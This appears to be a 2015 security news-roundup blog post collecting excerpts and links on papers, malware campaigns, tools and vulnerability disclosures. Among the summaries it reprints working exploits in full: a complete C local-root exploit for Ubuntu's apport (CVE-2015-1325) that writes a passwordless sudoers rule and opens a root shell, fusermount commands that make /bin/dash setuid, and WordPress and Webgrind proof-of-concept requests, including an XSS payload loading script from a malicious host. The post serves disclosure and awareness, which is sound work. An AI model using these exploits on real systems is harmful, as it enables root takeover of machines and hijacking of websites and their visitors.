Friday, May 22, 2015

Paper: Security Analysis of Consumer-Grade Anti-Theft Solutions Provided by Android Mobile Anti-Virus Apps

Abstract
We study the “anti-theft” mechanisms available to consumers
to thwart unauthorised access to personal data on
stolen Android smartphones. With millions of devices stolen
in the USA in 2013 alone, such attacks are a serious and
growing problem. The main mitigation against unauthorised
data access on stolen devices is provided by “anti-theft”
apps; that is, with “remote wipe” and “remote lock” functions.
We study the top 10 Mobile Anti-Virus (MAV) apps
that implement these functions. They have been downloaded
hundreds of millions of times.
We investigate the general security practices of MAVs,
as well as the implementation of their “remote wipe” and
“remote lock” functions. Our analysis uncovers flaws that
undermine MAV security claims and highlight the fragility
of third-party security apps. We find that MAV remote locks
may be unreliable due to poor implementation practices,
Android API limitations and vendor customisations. Mobile
OS architectures leave third-party security apps little leeway
to improve built-in Factory Resets, therefore MAV remote
wipe functions are not an alternative to a flawed built-in
Factory Reset. We conclude the only viable solutions are
those driven by vendors themselves

more here.........http://ieee-security.org/TC/SPW2015/MoST/papers/s3p3.pdf

Additional Article- Exploring CVE-2015-1701 — A Win32k Elevation of Privilege Vulnerability Used in Targeted Attacks

Our analysis of the win32k.sys vulnerability used in a recent targeted attack reveals that it opens up an easy way to bypass the sandbox, making it a bigger threat than originally thought.

As mentioned in Microsoft security bulletin MS15-051, CVE-2015-1701 is an elevation of privilege vulnerability that exists when the Win32k.sys kernel-mode driver improperly handles objects in memory. The vulnerability exists in Win32k.sys, which is a weak security point in Windows.

Elevation of privilege vulnerabilities are technically less dangerous since they can’t be exploited remotely, but since this vulnerability can be used to bypass the sandbox — a security feature designed to keep attackers from being able to execute malicious files in users’ environment — this becomes a viable tool for attackers.

more here.......http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-cve-2015-1701-a-win32k-elevation-of-privilege-vulnerability-used-in-targeted-attacks/

WebSockets From Scratch

This guide is aimed at people who are new to WebSocket, or just wish to know more about what’s under the hood. What I’ll cover, in around 100 lines of Ruby, is:

The HTTP handshake that initiates a WebSocket connection.
Listening to messages on the server.
Sending messages from the server.

more here........https://blog.pusher.com/websockets-from-scratch/

Malware attack on both Windows and Android

On the 7th of May, 2015 we observed a new malicious e-mail campaign, which used the logo and the name of Polish Post Office (”Poczta Polska”). The e-mail supposedly informed about an undelivered package – however, they also included a link which, after several redirects, lead to the download of a malicious file. This file was either a Windows executable or Android APK file (depending on the presented User Agent string).

The e-mails were similar to the one presented below here.........http://www.cert.pl/news/10180/langswitch_lang/en

Exploring a Hacker Marketplace

In the sharing economy, you can hire a one-off driver (Uber), courier (Postmates), grocery shopper (Instacart), housekeeper (Homejoy), or just about any other variety of henchman (TaskRabbit). So, what about hiring a hacker?

That’s the premise of Hacker’s List, a website launched in November. Anyone can post or bid on a hacking project. Hacker’s List arranges secure communication and payment escrow.

more here........http://webpolicy.org/2015/05/21/exploring-a-hacker-marketplace/

Improved PDF analysis and Windows 10 Preview

Today we made another 'technological leap' with VxStream Sandbox related to PDF analysis. As most of you surely know, PDF phishing campaigns are a very popular attack vector (invoice/mail tracking PDF with a link to the malicious file). The new version of VxStream is capable of parsing PDF file structure and pulls out URLs it finds. Not only that, but it will also download files at the URLs and execute them if they are supported by the environment. If the downloaded file is a zip archive, it will even unpack it before analysis. Sounds good? :) It is!

more here..........http://payload-security.blogspot.de/2015/05/greatly-improved-pdf-analysis-and.html

A Faster Way to Identify High Risk Windows Assets

Scanning is a pretty common first step when trying to identify Windows systems that are missing critical patches.  However, there is a faster way to start the process.  Active Directory stores the operating system version and service pack level for every Windows system associated with the domain.  Historically that information has been used during penetration tests to target systems missing patches like MS08-67, but it can also be used by blue teams to help streamline identification of high risk assets as part of their standard vulnerability management approach.  In this blog I’ll cover a high level overview of how it can be done and point to a few scripts that can be used to help automate the process.

read more here..........https://blog.netspi.com/a-faster-way-to-identify-high-risk-windows-assets/

Paper: Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android Applications

Abstract—Android’s Inter-Component Communication (ICC)
mechanism strongly relies on Intent messages. Unfortunately, due
to the lack of message origin verification in Intents, implementing
security policies based on message sources is hard in practice,
and completely relies on the programmer’s skill and attention. In
this paper, we present a framework for automatically detecting
Intent input validation vulnerabilities. We are thus able to
highlight component fragments that expose vulnerable resources
to possible malicious message senders. Most importantly, we
advance the state of the art by developing a method to automatically
demonstrate whether the identified vulnerabilities can
be exploited or not, adopting a formal approach to automatically
produce malicious payloads that can trigger dangerous behavior
in vulnerable applications. We therefore eliminate the high rate of
false positives common in previously applied methods. We test our
methods on a representative sample of applications, and we find
that 29 out of 64 tested applications are detected as potentially
vulnerable, while 26 out of 29 can be automatically proven to be
exploitable. Our experiments demonstrate the lack of exhaustive
sanity checks when receiving messages from unknown sources,
and stress the underestimation of this problem in real world
application development.

CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]

# Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description
  
Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. 
Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege 
escalation can lead to a serious incident because the malicious user can take administrative role to the infected 
website.
  
2 Proof of Concept

* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: 
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
4 Solution
  
No official solution yet exists.

CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]

# Exploit Title: WordPress WP Membership plugin [Stored XSS]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4039

=============================================
* 1. Stored XSS
=============================================

1.1 Description
  
All input fields from registered users aren't properly escaped. This could lead to an XSS attack that could possibly 
affect all visitors of the website, including administators.
  
1.2 Proof of Concept

* Login as regular user
* Update any field of your profile appending at the end
        `<script>alert('XSS');</script>` 
        or 
        `<script src=”http://malicious .server/my_malicious_script.js”/>`
  
1.3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
1.4 Solution
  
No official solution yet exists.

=============================================
* 2. Unauthorized post publish and stored XSS
=============================================

2.1 Description
  
Registered users can publish a post without administrator confirmation. Normally all posts submitted  by users 
registered with WP Membership plugin are stored with the status `pending`. A malicious user though can publish his post 
by crafting the form is used for submission.
  
2.2 Proof of Concept

* Login as regular user
 whom belongs to a group that can submit new posts
* Visit the `New Post` section at your profile
* Change field `post_status`:
        <select id="post_status" class="form-control" name="post_status">
                <option value="publish" selected=”selected”>Pending Review</option>
                <option value="draft">Draft</option>
        </select>

The post gets immediately published after you submit the form and is visible to all visitors of the website.

In addition a stored XSS attack can be performed due to insufficient escaping of the post content input.
  
2.3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
2.4 Solution
  
No official solution yet exists.

2.5 Workaround

Prevent users from submitting new posts through the relative option in plugin's settings

Paper: Measuring and mitigating AS-level adversaries against Tor

Abstract The popularity of Tor as an anonymity system has made it a popular target for a variety of attacks including blocking, denial of service, and timing attacks. In this paper, we focus on timing attacks which are no longer solely in the realm of academic research with recent revelations about the NSA and GCHQ actively working to implement them in practice. We specifically focus on recently exposed timing attacks that leverage asymmetric routing and information gained on reverse network paths (e.g., via TCP ACK numbers) to deanonymize Tor users. First, we present an empirical study which leverages scalable algorithmic simulations of routing policies on an up-todate map of the Internet’s topology, including complex AS relationships and sibling ASes. Our approach allows us to gain a high fidelity snapshot of the threat of timing correlation attacks in the wild. In our experiments we find that 58% of all circuits created by Tor are vulnerable to attacks by timing correlation and colluding sibling ASes. In addition, we find that in some regions (notably, China) there exist a number of cases where it is not possible for Tor to construct a circuit that is safe from these correlation attacks. To mitigate the threat of such attacks, we build Astoria– an AS-aware Tor client. Astoria uses leverages recent developments in network measurement to perform pathprediction and intelligent relay selection. Astoria not only reduces the number of vulnerable circuits to 5.8%, but also considers how circuits should be created when there are no safe possibilities. Astoria also performs load balancing across the Tor network, so as to not overload low capacity relays. In addition, Astoria provides reasonable performance even in its most secure configuration.

more here.........http://arxiv.org/pdf/1505.05173.pdf

qboot

Minimal x86 firmware for booting Linux kernels here........https://github.com/bonzini/qboot

Paper: Indirect File Leaks in Mobile Applications

Abstract—Today, much of our sensitive information is stored
inside mobile applications (apps), such as the browsing histories
and chatting logs. To safeguard these privacy files, modern mobile
systems, notably Android and iOS, use sandboxes to isolate apps’
file zones from one another. However, we show in this paper
that these private files can still be leaked by indirectly exploiting
components that are trusted by the victim apps. In particular,
we devise new indirect file leak (IFL) attacks that exploit browser
interfaces, command interpreters, and embedded app servers to
leak data from very popular apps, such as Evernote and QQ.
Unlike the previous attacks, we demonstrate that these IFLs can
affect both Android and iOS. Moreover, our IFL methods allow
an adversary to launch the attacks remotely, without implanting
malicious apps in victim’s smartphones. We finally compare the
impacts of four different types of IFL attacks on Android and
iOS, and propose several mitigation methods.

more here.....http://ieee-security.org/TC/SPW2015/MoST/papers/s2p2.pdf

Linking Attackers and Tools pt. 2

The Problem

In my last post I discussed using Splunk and the custom_vizs app to create links between attackers using common infrastructure. At the end I discussed some of the problems with this implementation so I decided to solve some of those problems. The major problem is that the graph doesn't really give much information just at a glance. So this is the one I set out to solve and I came up with two different solutions.

Splunk

I love Splunk. I used to use what is now known as the ELK stack but after I discovered the true power of Splunk it is a very worthy investment. Since this problem started in Splunk it is only fitting that I also solve it with Splunk and I solved it with the join command.

A new Metasploit module for SOHO devices

This module exploits an authentication bypass vulnerability in different Netgear devices.
+        It allows to extract the password for the remote management interface. This module has been
+        tested on a Netgear WNDR3700v4 - V1.0.1.42, but others devices are reported as vulnerable:
+        NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,
+        NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),
+        NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),
+        NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),
+        NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),
+        NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),
+        NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),
+        NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),
+        NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),
+        NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton)

Access here...........https://github.com/rapid7/metasploit-framework/commit/305da464918d35bfca3e13acaa5a2afcbab91052

Joke or Blunder: Carbanak C&C Leads to Russia Federal Security Service

In an interesting turn of events, a C&C used in the Carbanak targeted attack campaign now resolves to an IP linked to the Russian Federal Security Service (FSB).
Yesterday, while checking the indicator of compromise (IOC) data from the Carbanak report, when I noticed that the domain name systemsvc.net (which was identified as a C&C server in the report) now resolves to the IP address 213.24.76.23. When I checked for related information, I found that the said IP is under ASN AS8342 RTCOMM-AS OJSC RTComm.RU and its identified location is Moscow City – Moscow – Federal Security Service Of Russian Federation.

Thursday, May 21, 2015

CVE-2015-1325 apport race conditions / ubuntu local root exploit

Hello, this is CVE-2015-1325 which was reported to the Ubuntu Security Team
on 2015-05-11. 

There are several race conditions in the apport crash reporter, leading to a
reliable local root privilege escalation that affects all current LTS versions
of Ubuntu Server/Desktop (default install).

Apport is also available on other distributions but as far as I know it is
only in use by default on Ubuntu.

--- DETAILS

Apport is specified as the coredump handler (/proc/sys/kernel/core_pattern)
since at least Ubuntu 12.04.

When a process receives a signal that should generate a coredump,
/usr/share/apport/apport will be invoked by the kernel as root.

On line 284, apport "partially drops privileges":
        drop_privileges(pid, True)

However, this has no real security benefit since the euid of the process will
still be root. In fact, this will make the second part of the attached exploit
more reliable because it allows us to send the privileged apport process
SIGSTOP/SIGCONT and hit the last race easily.

On line 394 apport opens a file in /var/crash:
        with open(report, 'rb') as f:

report is the filename, which can be easily predicted. If a user with uid 1000
makes /bin/sleep crash, the filename will be: /var/crash/_bin_sleep.1000.crash

The directory /var/crash is world writable, so we can create a FIFO in this
directory before making our program crash. Apport will then try to read our
file and hang on line 394 until a report is written to the FIFO by us.

When apport is in this paused state, we can kill our original process and keep
forking until we get the same pid again. We then make this process execute
/bin/su which makes our original pid belong to a root process.

The drop_privileges() function on line 49 incorrectly uses the pid as the
indicator as to which uid we should drop privileges to:

def drop_privileges(pid, partial=False):
[...]
        stat = os.stat('/proc/%s/stat' % pid)
[...]
        effective_uid = stat.st_uid
[...]
        os.setreuid(stat.st_uid, effective_uid)

We can therefore make apport "drop" privileges to uid 0 and write a corefile
anywhere on the system.

This can be used to write a corefile with crafted contents in a suitable
location to gain root privileges.

On versions since at least Ubuntu 14.04 it is possible to completely control
the contents of the written corefile. This allows easy and reliable
exploitation by leveraging /etc/sudoers.d.

--- EXPLOIT FLOW

1. Create a FIFO in /var/crash/_bin_sleep.$uid.crash.
2. fork(), chdir("/etc/sudoers.d"), execute /bin/sleep and send SIGSEGV
3. Send SIGKILL to the process in (2), fork() until we get the same pid
   as the process we killed.
4. In our new process with the original pid, execute /bin/su.
5. Send valid report data to /var/crash/_bin_sleep.$uid.crash.
6. Core file is written to /etc/sudoers.d/core as root with mode 0600.

We could put this corefile in /etc/cron.hourly, /etc/logrotate.d and so on.

Additionally, on 14.04+ we can do this:

The partial privilege drop on line 284 allows us to send SIGSTOP to apport,
which gives us great control over the execution flow. On line 460 apport will
ultimately write the corefile contents by reading from the report file it just
created in /var/crash.

7. Keep sending SIGSTOP/SIGCONT until these lines have been executed:
   404: os.unlink(report)
   410: reportfile = os.fdopen(os.open(report, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0), 'wb')
8. Unlink /var/crash/_bin_sleep.$uid.crash
9. Create FIFO in /var/crash/_bin_sleep.$uid.crash
10. Write crafted contents to /var/crash/_bin_sleep.$uid.crash
11. Apport will read our FIFO at line 155 and create a corefile with our
    crafted contents.

--- CREDIT

Philip Pettersson, Samsung SDS Security Center

--- EXPLOIT

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1325 / apport-pid-race.c
apport race conditions

ubuntu local root
tested on ubuntu server 14.04, 14.10, 15.04

core dropping bug also works on older versions, but you can't
write arbitrary contents. on 12.04 /etc/logrotate.d might work,
didn't check. sudo and cron will complain if you drop a real ELF
core file in sudoers.d/cron.d

unpriv () ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race
created /var/crash/_bin_sleep.1002.crash
crasher: my pid is 1308
apport stopped, pid = 1309
getting pid 1308
current pid = 1307..2500..5000..7500..10000........
** child: current pid = 1308
** child: executing /bin/su
Password: sleeping 2s..

checker: mode 4532
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
# id
uid=0(root) gid=0(root) groups=0(root)

85ad63cf7248d7da46e55fa1b1c6fe01dea43749
2015-05-10
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>


char *crash_report = "ProblemType: Crash\nArchitecture: amd64\nCrashCounter: 0\nDate: Sat May  9 18:18:33 
2015\nDistroRelease: Ubuntu 15.04\nExecutablePath: /bin/sleep\nExecutableTimestamp: 1415000653\nProcCmdline: sleep 
1337\nProcCwd: /home/rebel\nProcEnviron:\n XDG_RUNTIME_DIR=<set>\nProcMaps:\n 00400000-00407000 r-xp 00000000 08:01 
393307                             /bin/sleep\nProcStatus:\n Name:  sleep\nSignal: 11\nUname: Linux 3.19.0-15-generic 
x86_64\nUserGroups:\n_LogindSession: 23\nCoreDump: base64\n H4sICAAAAAAC/0NvcmVEdW1wAA==\n 
U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\n";
/*
last line is the stuff we write to the corefile

c = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS)
t = '# \x01\x02\x03\x04\n\n\nALL ALL=(ALL) NOPASSWD: ALL\n'
# need some non-ASCII bytes so it doesn't turn into a str()
# which makes apport fail with the following error:
#    os.write(core_file, r['CoreDump'])
# TypeError: 'str' does not support the buffer interface
t = bytes(t,'latin1')
c.compress(t)
a = c.flush()
import base64
base64.b64encode(a)

# b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA=='
*/

int apport_pid;
char report[128];

void steal_pid(int wanted_pid)
{
    int x, pid;

    pid = getpid();

    fprintf(stderr,"getting pid %d\n", wanted_pid);
    fprintf(stderr,"current pid = %d..", pid);

    for(x = 0; x < 500000; x++) {
        pid = fork();
        if(pid == 0) {
            pid = getpid();
            if(pid % 2500 == 0)
                fprintf(stderr,"%d..", pid);

            if(pid == wanted_pid) {
                fprintf(stderr,"\n** child: current pid = %d\n", pid);
                fprintf(stderr,"** child: executing /bin/su\n");

                execl("/bin/su", "su", NULL);
            }
            exit(0);
            return;
        }
        if(pid == wanted_pid)
            return;

        wait(NULL);
    }

}



void checker(void)
{
    struct stat s;
    int fd, mode, x;

    stat(report, &s);

    fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode);

    mode = s.st_mode;

    while(1) {
// poor man's pseudo-singlestepping
        kill(apport_pid, SIGCONT);
        kill(apport_pid, SIGSTOP);

// need to wait a bit for the signals to be handled,
// otherwise we'll miss when the new report file is created
        for(x = 0; x < 100000; x++);

        stat(report, &s);

        if(s.st_mode != mode)
            break;
    }

    fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode);

    unlink(report);
    mknod(report, S_IFIFO | 0666, 0);

    fprintf(stderr,"checker: SIGCONT\n");
    kill(apport_pid, SIGCONT);

    fprintf(stderr,"checker: writing core\n");

    fd = open(report, O_WRONLY);
    write(fd, crash_report, strlen(crash_report));
    close(fd);
    fprintf(stderr,"checker: done\n");

    while(1)
        sleep(1);
}



void crasher()
{
    chdir("/etc/sudoers.d");

    fprintf(stderr,"crasher: my pid is %d\n", getpid());

    execl("/bin/sleep", "sleep", "1337", NULL);

    exit(0);
}


int main(void)
{
    int pid, checker_pid, fd;
    struct rlimit limits;
    struct stat s;

    limits.rlim_cur = RLIM_INFINITY;
    limits.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &limits);

    pid = fork();

    if(pid == 0)
        crasher();

    sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid());

    unlink(report);
    mknod(report, S_IFIFO | 0666, 0);

    fprintf(stderr,"created %s\n", report);

    usleep(300000);
    kill(pid, 11);
    apport_pid = pid + 1;
// could check that pid+1 is actually apport here but it's
// kind of likely
    fprintf(stderr,"apport stopped, pid = %d\n", apport_pid);

    usleep(300000);

    kill(pid, 9);
    steal_pid(pid);
    sleep(1);

    kill(apport_pid, SIGSTOP);

    checker_pid = fork();

    if(checker_pid == 0) {
        checker();
        exit(0);
    }

    fprintf(stderr,"sleeping 2s..\n");
    sleep(2);

    fprintf(stderr,"writing to fifo\n");

    fd = open(report, O_WRONLY);
    write(fd, crash_report, strlen(crash_report));
    close(fd);

    fprintf(stderr,"fifo written.. wait...\n");
    fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n");

    while(1) {
        stat("/etc/sudoers.d/core", &s);
        if(s.st_size == 37)
            break;
        usleep(100000);
    }

    fprintf(stderr,"success\n");
    kill(pid, 9);
    kill(checker_pid, 9);
    return system("sudo -- sh -c 'stty echo;sh -i'");
}


Forensic Browser - quick start

In this article I want to cover a few of the areas where the Forensic Browser for SQLite provides features that are missing in other browsers or where it complements other more generic forensic software by providing features that are specific to general databases rather than specific ones. The Browser does this by providing a Visual Query Building environment (drag and drop SQL query generation) allowing the creation of very powerful and customised reports often without typing a single character.

more here........http://sandersonforensics.com/forum/content.php?232-Forensic-Browser-quick-start

Mumblehard Malware

In this article, we will learn about a malware known as Mumblehard which is known for targeting Linux and BSD OS. This malware opens a backdoor that gives the full control of the infected machine to cybercriminals.

more here........http://resources.infosecinstitute.com/mumblehard-malware/

Fake jQuery Scripts in Nulled WordPress Plugins

We recently investigated some random redirects on a WordPress website that would only happen to certain visitors. Traffic analysis showed us that it was not a server-side redirect, rather it happened due to some script loaded by the web pages.
A quick look through the HTML code revealed this script:
Fake jQuery script injection
Fake jQuery script injection
It was very suspicious for a few reasons

Hacking Starbucks for unlimited coffee

This is a story about how I found a way to generate unlimited amount of money on Starbucks gift cards to get life-time supply of coffee or steal a couple of $millions.

So I got an idea to buy 3 Starbucks cards $5 each

starbucks.com has personal accounts where you can add gift cards, check balances and even transfer money between your gift cards.

There’s an interesting class of vulnerabilities called “race condition”. It’s very common bug for websites with balances, vouchers or other limited resources (mostly money).

morehere..........http://sakurity.com/blog/2015/05/21/starbucks.html

CVE-2015-3202 fuse privilege escalation

Hello, this was discussed on the distros list last week.

The fusermount binary calls setuid(geteuid()) to reset the ruid when
it invokes /bin/mount so that it can use privileged mount options that
are normally restricted if ruid != euid. That's acceptable (but scary)
in theory, because fusermount can sanitize the call to make sure it's
safe.

http://sources.debian.net/src/fuse/2.9.3-15/util/mount_util.c/?hl=99#L99

However, because mount thinks it's being invoked by root, it allows
access to debugging features via the environment that would not
normally be safe for unprivileged users and fusermount doesn't
sanitize them.

Therefore, the bug is that the environment is not cleared when calling
mount with ruid=0. One debugging feature available is changing the
location of /etc/mtab by setting LIBMOUNT_MTAB, which can be abused to
overwrite arbitrary files.

This can be exploited like so.

$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/bash.bashrc  _FUSE_COMMFD=0 fusermount
'/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=taviso 0 0

Then simply wait for root to login, or alternatively overwrite
/etc/default/locale and wait for cron to run a script that sources it.
That means root wouldn't have to log in, but you would have to wait
around until midnight to check if it worked.

Tavis Ormandy


Webgrind XSS vulnerability

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is a Xdebug Profiling Web Frontend in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
==============
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==================================

Vendor Notification  May 19, 2015
May 20, 2015: Public Disclosure


Severity Level:
===============
Med

Description:
============

Request Method(s):
                                [+] GET

Vulnerable Product:
                                [+] Webgrind 

Vulnerable Parameter(s):
                                [+] file=[XSS]

Affected Area(s):
                                [+] Current user.

==============================

(hyp3rlinx)

Efficient, Offline Access for Neustar IP Intelligence Data

IP intelligence is useful for applications such as localization and enforcing security policy. Duo uses such information to power parts of our recently released Platform Edition. Two popular vendors in this space are Neustar and MaxMind. MaxMind’s GeoIP services tend to cost less or are entirely free, both of which have contributed to greater availabilty of open-source tools. Neustar’s GeoPoint service provides additional and different data; however, it isn’t as widely used, and, as such, there isn’t as strong of an open-source community. Additionally, GeoPoint is delivered in CSV format, which is computationally difficult to query in real time.

We have developed and released a solution to solve these two problems (lack of community-maintained tools and computational query cost) by converting Neustar GeoPoint data into the database format used by MaxMind GeoIP. This allows Neustar customers to take advantage of the speed of MaxMind’s offline database format and the collection of community-supported tools for MaxMind databases.

more here........https://www.duosecurity.com/blog/efficient-offline-access-neustar-ip-intelligence

How to Pass-the-Hash with Mimikatz

I’m spending a lot of time with mimikatz lately. I’m fascinated by how much capability it has and I’m constantly asking myself, what’s the best way to use this during a red team engagement?

A hidden gem in mimikatz is its ability to create a trust relationship from a username and password hash. Here’s the mimikatz command to do this http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/

Paper: Security Analysis of Android Factory Resets

Abstract With hundreds of millions of devices expected to be traded by 20181 , flaws in smartphone sanitisation functions could be a serious problem. Trade press reports2 have already raised doubts about the effectiveness of Android “Factory Reset”, but this paper presents the first comprehensive study of the issue. We study the implementation of Factory Reset on 21 Android smartphones from 5 vendors running Android versions v2.3.x to v4.3. We estimate that up to 500 million devices may not properly sanitise their data partition where credentials and other sensitive data are stored, and up to 630M may not properly sanitise the internal SD card where multimedia files are generally saved. We found we could recover Google credentials on all devices presenting a flawed Factory Reset. Full-disk encryption has the potential to mitigate the problem, but we found that a flawed Factory Reset leaves behind enough data for the encryption key to be recovered. We discuss practical improvements for Google and vendors to mitigate these risks in the future.

more here........http://www.cl.cam.ac.uk/~rja14/Papers/fr_most15.pdf

sandbox_toolkit

Various tools to deal with OS X and iOS sandbox profiles here......https://github.com/sektioneins/sandbox_toolkit

Attack Gains Foothold Against East Asian Government Through “Auto Start”

East Asian government agencies came under siege when attackers targeted several servers within their networks. The said attackers, who showed familiarity and in-depth knowledge of their agencies’ network topology, tools, and software, were able to gain access to their targeted servers and install malware. After which, they used the compromised servers not only as gateways to the rest of the network but also as C&C servers. This particular attack has been active since 2014.

The attackers tried to maintain their presence in the network by modifying applications installed in the servers. Certain files in the said applications—mostly productivity, security, and system utility apps—were tampered to load malicious DLL files. The common denominator among these tampered apps is that they were all set to run upon system startup. This suggests that the applications were modified in order to ensure that the installed malware will run every time the server is launched.

more here.......http://blog.trendmicro.com/trendlabs-security-intelligence/attack-gains-foothold-against-east-asian-government-through-auto-start/

Test if your server is affected by the Logjam attack using openssl(1)1.0.

The Logjam Attack exploits a weakness affecting all versions of the TLS protocol which allows a monster-in-the-middle to downgrade to 512-bit export grade cryptography.

Our recommendations were always to use Diffie-Hellman parameters > 1024 bits. The general recommendation is to use 4096bits wherever possible but at least the same length as your RSA key size. That means at least 2048bit DH-Parameters or longer when using 2048bit RSA keys.

more here........https://bettercrypto.org/blog/2015/05/20/tls-logjam/

FwpsStreamInjectAsync0 bug/leak - Bitdefender (0x4A)

Today I'll be investigating an issue involving Bitdefender, which is turned out to be a Windows bug/issue when I thought it'd be on Bitdefender. Bitdefender's 0x4A bug check issue has been prevalent for quite awhile now, but there's little to no documentation on solving it or what's causing it, just a few things to try like updating Bitdefender, uninstalling it, etc. I'll try to go in-depth as I can, especially because I'm in contact with a Senior Dev at Bitdefender, and I'd like to provide as much information that my personal knowledge allows me.

more here.......http://bsodanalysis.blogspot.com/2015/05/fwpsstreaminjectasync0-bugleak.html

An APT Case Study

The RSA IR team deals with APT actors on a daily basis on networks of various sizes. Regardless of the size of the network, or the number of advanced actors we find in them, one thing is paramount to both us and our customers during investigations: the ability to quickly scope severity of the intrusion.  Achieving this goal requires the best possible visibility, and the right tools that are flexible enough to allow our analysts to hunt for artifacts both from the network and endpoint perspective.

RSA IR uses two flagship products to achieve this goal.

more here.....https://blogs.rsa.com/apt-case-study/

Paper: ErsatzPasswords – Ending Password Cracking

Abstract In this work we present a simple, yet effective and practical, scheme to improve the security of stored password hashes rendering their cracking detectable and insuperable at the same time. We utilize a machine-dependent function, such as a physically unclonable function (PUF) or a hardware security module (HSM) at the authentication server. The scheme can be easily integrated with legacy systems without the need of any additional servers, changing the structure of the hashed password file or any client modifications. When using the scheme the structure of the hashed passwords file, etc/shadow or etc/master.passwd, will appear no different than in the traditional scheme.1 However, when an attacker exfiltrates the hashed passwords file and tries to crack it, the only passwords he will get are the ersatzpasswords — the “fake passwords”. When an attempt to login using these ersatzpasswords is detected an alarm will be triggered in the system that someone attempted to crack the password file. Even with an adversary who knows the scheme, cracking cannot be launched without physical access to the authentication server. The scheme also includes a secure backup mechanism in the event of a failure of the hardware dependent function. We discuss our implementation and provide some discussion in comparison to the traditional authentication scheme.

more here..........https://www.meshekah.com/research/publications_files/tr_ersatz_passwords.pdf

Spy agencies target mobile phones, app stores to implant spyware

Users of millions of smartphones put at risk by certain mobile browser gaps, Snowden file shows
more here..http://www.cbc.ca/news/canada/spy-agencies-target-mobile-phones-app-stores-to-implant-spyware-1.3076546

Apache Jackrabbit 2.10.1.Release

This release fixes an important security issue in the jackrabbit-webdav module that you can access here....http://jackrabbit.apache.org/jcr/downloads.html

LaZagne- Credentials recovery project

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. At this moment, it supports 22 Programs on Microsoft Windows and 12 on a Linux/Unix-Like OS.

more here........https://github.com/AlessandroZ/LaZagne

The LaZagne project

Evidence Acquisition and Analysis from iCloud

